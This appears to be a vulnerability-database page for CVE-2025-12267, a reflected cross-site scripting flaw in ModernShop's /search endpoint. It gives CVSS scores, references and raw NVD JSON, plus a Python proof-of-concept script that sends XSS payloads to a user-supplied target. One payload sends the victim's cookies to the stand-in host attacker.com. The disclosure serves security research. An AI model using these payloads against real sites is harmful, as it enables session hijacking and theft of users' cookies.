CVE-2025-12267

Description

A flaw has been found in abhicodebox ModernShop 20250922. This issue affects some unknown processing of the file /search. Executing manipulation of the argument q can lead to cross site scripting. The attack may be performed from remote. The exploit has been published and may be used.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

abhicodebox ModernShop <= 20250922

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-12267 PoC - ModernShop XSS in /search endpoint
# Target: abhicodebox ModernShop 20250922
# Vulnerability: Reflected XSS via q parameter

target_url = input("Enter target URL (e.g., http://target.com): ").rstrip('/')
search_endpoint = f"{target_url}/search"

# XSS payload - steals cookies
xss_payload = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"

# Alternative payloads
xss_payloads = [
    "<script>alert(document.domain)</script>",
    "<img src=x onerror=alert(document.cookie)>",
    "<svg onload=alert(document.cookie)>",
    xss_payload
]

print(f"[*] Target: {search_endpoint}")
print(f"[*] Testing {len(xss_payloads)} XSS payloads...\n")

for i, payload in enumerate(xss_payloads, 1):
    params = {"q": payload}
    try:
        response = requests.get(search_endpoint, params=params, timeout=10)
        if payload in response.text:
            print(f"[+] Payload {i} reflected in response - VULNERABLE!")
            print(f"    URL: {response.url}")
        else:
            print(f"[-] Payload {i} not reflected")
    except requests.RequestException as e:
        print(f"[!] Request failed: {e}")

print("\n[*] Manual verification: Copy the generated URL and open in browser")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12267
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12267
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12267/
[4] VulDB https://vuldb.com/cve/CVE-2025-12267
[5] https://vuldb.com/?ctiid.329939
[6] https://vuldb.com/?id.329939
[7] https://vuldb.com/?submit.673717
[8] https://www.codester.com/items/comments/58847/modern-shop-php-ecommerce-platform

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12267", "sourceIdentifier": "[email protected]", "published": "2025-10-27T11:15:40.410", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in abhicodebox ModernShop 20250922. This issue affects some unknown processing of the file /search. Executing manipulation of the argument q can lead to cross site scripting. The attack may be performed from remote. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://vuldb.com/?ctiid.329939", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329939", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.673717", "source": "[email protected]"}, {"url": "https://www.codester.com/items/comments/58847/modern-shop-php-ecommerce-platform", "source": "[email protected]"}]}}